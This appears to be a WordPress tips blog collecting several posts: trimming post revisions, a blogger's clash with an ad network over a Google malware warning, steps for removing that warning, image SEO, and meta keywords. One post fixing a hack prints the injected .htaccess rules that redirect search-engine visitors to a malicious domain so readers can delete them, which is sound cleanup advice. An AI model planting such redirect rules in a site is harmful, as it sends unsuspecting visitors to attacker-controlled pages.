Learn tips and tricks for running and writing a successful Wordpress blog or website. Search engine optimization (SEO) tips, image SEO, and more!

WordPress has a built-in revision system that stores each saved draft or post update. This is super handy but also flawed at the same time. Over time, these WordPress revisions can really add up to a lot of space in your database. I recommend you delete WordPress revisions on a regular basis to keep your database clutter free.

Let’s say you started writing a new post, previewed it, made seven more draft saves, then published. Even though each revision may have only been a word or two, you’ve just added 10 full-length copies of your post in the database (one of which is an autosave).

How to limit the number of post revisions in your WordPress database with a plugin

I recommend downloading the Better Delete Revision plugin for WordPress to clean up old post revisions. It’s as simple as clicking a button! This plugin also has an additional feature of optimizing your database (which you should do after deleting WordPress post revisions). See below for an example WordPress blog which has never deleted any revisions.. ouch!

Why You Need to Delete WordPress Revisions

How to automatically limit the number of post revisions in your WordPress database

WordPress has set up a handy little line of code that limits the number of post revisions store for any given post. Edit your wp-config.php file and add the following line:

define( 'WP_POST_REVISIONS', 3 );

This will tell WordPress to store a maximum of three revisions per post (which is actually four, counting the autosave). If you want more than three, just change to a number you’re comfortable with.

Alternatively, if you don’t want WordPress to store any revisions, add this line instead:

define('WP_POST_REVISIONS', false);

I hope that helps! If you installed the Better Delete Revision WordPress plugin, how many revisions did you delete?

This post was from a mom blog I use to write. Its content was too good not to share. Enjoy.

This morning, I woke up to something super duper fun.

izea-media-malware

Yeah.. for real.

After some digging, I found out the error was related to a JavaScript code placed on my site for IZEA Media network which is an advertising network. You see, a lot of bloggers belong to different advertising networks such as Google AdSense and IZEA Media. These advertising networks pay bloggers to put advertisements on their sites, like this one.

At approximately 9:20am ET this morning, I located the culprit (IZEA Media JavaScript code) and removed it from my site immediately. Then I began frantically searching the internet to figure out how to remove the big, nasty, red your site sucks box. I discovered that I was supposed to visit Google Webmaster Tools >> Health >> Malware and then click the “Request Review” button. Well guess what? I do not have a “Request Review” button. And after even more searching, I found that it can take a day or two just for this button to appear! Great.

I also stumbled upon a site called StopBadware and learned that I can request a manual review of my site which reportedly may speed things up, which I did also. And it’s still “in progress” since approximately 9:30am.

My next order of business? To contact IZEA Media by email and thank them for the wonderful day I’ve had. The conversation:

Me (9/21/12 10:33am):

I had to remove your ad from my site because Google reported my site as malicious due to your “desktop head tag” code. Thanks for that.. I’m very upset about this. My site is blacklisted now because of your code!

IZEA Media (9/21/12 10:34am):

We are aware of the issue, and we have since removed the offending advertiser but until Google does a diagnostic check (which they are in the process of going through) the warning will still appear. There is no threat of actually downloading malware or contracting malware to your device, the advertiser has been banned by our partner network. You will not need a new ad tag as this was an ad from our partner site and was not actually attached to the ad tag. As soon as Google has completed the diagnostic check the warning will go away.

Me (9/21/12 11:11am):

Thanks all fine and dandy however my site is now blacklisted by Google thanks to this ad. How did this ad get through in the first place?

I have been working on getting my site removed from the blacklist for 2 hours because of the ad IZEA allowed to display. I am extremely upset about this. My readers are now concerned that I am a scam site that places viruses on their computers.

IZEA Media (9/21/12 11:33am):

Unfortunately with online advertising there is always a risk of malware getting through. While we and our other third part networks put checks in place to prevent this from happening occasionally something can slip through. This is the case with any online advertising network. Once Google has completed the diagnostic scan the warning should go away unless you are working with the third party network in question in another one of your ad placements.

Me (9/21/12 12:26pm):

So are you providing Google with a list of all affected sites (like mine) so they can remove the blacklist that was placed on them? Otherwise my site, and all others, will remain on Google’s blacklist until they are notified of each individual URL that was affected by this malicious ad.

IZEA Media (9/21/12 1:00pm):

Google has a list of all of our sites since we partner with them. If you remove the ad tag completely from your site the malware warning will go away. You can then choose to place the ad tag live again when the malware warning has been lifted.

Me (9/21/12 1:05pm):

Yes, I did remove the script from my site by 9:20am ET. Unfortunately Google is still reporting my site as suspicious 4 hours later. See http://www.google.com/safebrowsing/diagnostic?site=freebiespot.net

IZEA Media (9/21/12 1:25pm):

Every other blogger that removed the ad tag has not had the malware warning once the ad tag has been removed. It is possible one of your other ad tags is hosting the malware as well. (which is a lie, see this blog post at IZEA)

Me (9/21/12 1:32pm):

I know that it is the only tag. It’s still has the same warning when I do a site scan. It’s because Google hasn’t released the block on my site. Hopefully you guys sent a list of all sites affected to Google so they can remove all the malware blocks set.

IZEA Media (9/21/12 1:47pm):

If you’re running any of the same ad networks as we are you could be experiencing the same issue we were. The issue was not with our network but one of our partner networks and we’re waiting in queue to be reviewed by Google. Since our network is so large it takes awhile to process but if you’d like to submit your own review you may do so by going here: https://www.google.com/webmasters/tools and since it is only one site it could speed up the process for your site.

Me (9/21/12 2:17pm):

Yes I submitted my site for removal over 5 hours ago and I’m still waiting. What a pain in the butt this all is. So disheartening, and meanwhile my visitors still see that I’m a “spam” site. Lovely.

And that was the last response. It is now nearly 6pm and I have heard nothing back from the Director of Advertising Operations at IZEA Media.

Meanwhile, the “Request Review” link still hasn’t shown up from Google, and my site still has a malware warning. Not to mention, any sites that are “hot linking” to my images are receiving notices that this blog is a malware site. What a glorious way to ruin a site’s reputation. Today, my site has had one-third of the traffic that it normally has.

Thanks, IZEA.

I run a few WordPress blogs, one of which is this fine one you’re reading now, but I also author another blog which deals with multiple advertising networks. Today, one of those networks was affected with malware. Thankfully my site was not affected but several of my friends’ sites were. This post will serve as an information gateway for you to learn how to remove a Google malware warning.

izea-media-malwareToday’s impact was huge. As an example, I have 10 blogging friends that I absolutely adore. Of those 10, five were affected – that’s 50%! The Google malware warning removal process is not quick by any means, in fact, it’s slow as crap. They take their sweet time, even when it’s Google’s fault or a “fake” malware warning. And there’s nothing you can do about it except follow the steps below to speed up the process.

  1. You’ve been affected and you’re getting the big nasty red Google malware warning shown above. Bummer… I’ve totally been there. The first thing you need to do is figure out what is causing the warning and remove anything related it. For example, today’s malware warning was from escalatenetwork.net and is affecting all WordPress widgets, iframes, and images hosted by escalatenetwork.net.
  2. Request a Malware Review with Google Webmaster Tools. The process is as follows:
    • Log in to Google Webmaster Tools.
    • From the Tool’s home page click on the link to the site that is being flagged to go to the site’s Dashboard.
    • There should be a large red banner across the top of the dashboard that says “This site may be distributing malware.” Clicking on the link that says “More Details” expands the dashboard to reveal a list of pages on the site that were found to be malicious. (You can also check Health -> Malware.)
    • Below this list is a link that says “Request a review.” Fill out this form and click the “Request a review” button to initiate the review process.
    • NOTE: It may take 24-48 hours just for the warning to show up in Google Webmasters Tools. This is the most frustrating and time-consuming part of the entire process.
  3. Sit back and wait. Normally, after you’ve completed step 2, things go pretty quickly from here. Try not to get too irritated while you wait.
  4. Periodically check Google Webmaster Tools to see if the error is gone. You can also use this link to see if your site is currently clean (according to Google), just replace YOURURLHERE with your URL: http://www.google.com/safebrowsing/diagnostic?site=www.YOURURLHERE.com
  5. Once your site no longer shows a Google malware warning, you need to request reconsideration of your site by Google. Rumor says they stop indexing your site when you have malware so you’ll want to make sure they start checking it again.

Four helpful links to check your site’s health and speed up the malware removal process:

I hope this post provides you with a step-by-step process for getting rid of a Google malware warning. If you’ve found this useful, please share it with a friend. 🙂 Good luck against the Google giant!

PS. Want to read my Google malware horror story? You can find it here.

SEOLearn how to optimize wordpress images for SEO. It is so insanely simple yet people just skip it. If you’re one of those people, don’t do that. Ever again. This valuable SEO tactic can bring in hundreds, if not thousands, of new search engine visitors each month. WordPress has built-in tools for image SEO; you don’t even need to install a plugin!

Search Engines “See” Differently

Search engine visitors (such as you and I) can see what an image is about just by looking at our monitors but search engines don’t have that luxury. The only thing a search engine “sees” is the title and file name. These two things are the key to the SEO of your images.

To optimize images for SEO, all images should have:

  • Relevant file names: Naming a photo unicorns.jpg when it is a photo of puppies isn’t the best tactic. Instead, include a relative SEO keyword in your image file name. Also, don’t use spaces in your file names; use dashes ( – ) or underscores ( _ ).
  • TITLE and ALTERNATE TEXT (ALT) definitions: This should be a short sentence or phrase describing the image. Be sure to include relevant SEO keywords. Note: ALT text isn’t really necessary for SEO but ALT text displays should there be a problem loading your image on your blog. ALT text is also useful for accessibility for visually-impaired visitors. ALT text is also what appears when a mouse arrow hovers over an image.

wordpress-image-seoThe other fields are not necessary and have nothing to do with search engine optimization.

And while we’re at it, if you have an image that doesn’t need to be clicked on while in a blog post (like the one at the top), then click the “None” button below the “Link URL”. The only time the Link URL should remain is when you have an image that needs to be viewed larger, such as a photo of food or instructional images (like the one to the right).

Real-Time Image SEO Examples

The SEO image at the top of this post is named seo.jpg and has TITLE and ALT text descriptions of ‘SEO’ for both. It is an image about SEO so that is what I would like people to search for to find it.

The instructional image above is named wordpress-image-seo.jpg and has TITLE and ALT text descriptions of wordpress-image-seo. (Are you seeing a pattern here? Yes, dashes are okay!)

So the next time you need to add an image to a WordPress post or page, do yourself an SEO favor and give the image a relevant file name and keyword-driven TITLE and ALT tags. Your analytics will thank you for it.

wordpress securityI’ve come across several WordPress blogs that have been hacked recently. But this is an unusual hack and you may not even know that your blog has been affected. You see, this hack occurs only when people are visiting your blog when coming from a search engine. When a visitor clicks your blog link from a search engine (i.e. Google), they are redirected to http://sokoloperkovuskecl.com/in.php?g=XXX (with XXX varying from blog to blog). But if you simply type the URL of the hacked blog in the browser, the redirection does not occur. Sneaky.

How to Know You’ve Been Hacked

A simple way to find out if you’ve been hacked is to search for your blog on Google and click a link to any of your blog pages. If you have been hacked, here is how to fix it.

  1. View/edit your .htaccess file located in your root WordPress directory. If you don’t know how to find this file or don’t have access to your files, then download and install the plugin WP Htaccess Editor. Warning: You can seriously mess up your blog if you delete or add something incorrectly to your .htaccess file. Please only mess with this file if you know what you’re doing or have explicit instructions on what to do (like I have provided below).
  2. Find and delete the entire hack (shown below) which is usually located at the top of the .htaccess file:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .*http://sokoloperkovuskecl.com/in.php?g=56 [R,L]
    </IfModule>
  3. If you’re using the WordPress plugin, save the file. If you’re editing the file on your server, you will need to save and/or upload the file.

Why You Were Hacked

You didn’t do anything wrong; don’t worry! The problem lies with a vulnerability in timthumb.php which is a component of some WordPress themes that is used to generate thumbnails. An unpatched timthumb.php file can allow code to be executed in the timthumb cache directory or can inject code into other WordPress files. If you’re concerned about this, ask your theme developer if your theme uses timthumb.php. If it does, make sure you have the newest version.

How to Prevent Your Blog From Being Hacked Again

If you don’t protect your blog, you will be hacked again. To prevent this, download and install the plugin BulletProof Security. I will walk you through the steps to setup BulletProof Security since this plugin may appear a little overwhelming.

  1. Navigate to BPS Security in your WordPress admin.
  2. Click the Backup & Restore tab, select the radio button next to “Backup .htaccess Files” and click “Backup Files.” (This is a security measure should you need to restore from your original backup.)
  3. Click the Security Modes tab. Click Backup .htaccess Files. Then click Backup .htaccess Files.
  4. Select the radio button next to the first “BulletProof Mode” and click “Activate.” Repeat this process for the other three “BulletProof Mode” radio buttons (one at a time) and click “Activate” after each one.
  5. Click the Backup & Restore tab, click the radio button next to “Backup BPS Master .htaccess Files” and click “Backup BPS Master .htaccess Files.”

If you’d like to check the security status of your blog, click the Security Status tab. All items should be green. If they aren’t green, you should fix them. If you don’t know how, tell me and I’ll try to help you.

Happy blogging!

seoI admit it, I was a meta keyword sucker too. Don’t fall for it! Google officially announced that meta keywords have no value in search engine ranking. In other words, it’s just a waste of time to throw keywords and phrases into the keywords meta tag.

Instead of researching meta keywords, focus your attention on:

  • Including keywords in the title (blog, website, page, post titles, etc)
  • Including keywords in meta description (increases search engine click-through rates)
  • Including keywords in your post, as close to the beginning as possible
  • Including keywords in the URL
  • Website speed (slow pages = lower rankings)

As an example, for this post I want to rank high in search engines for the keywords “Meta Keywords” and “Google”. I have used these keywords in the title, the meta description, the post, and the URL. And hopefully Google will show me some love. 🙂

Happy blogging!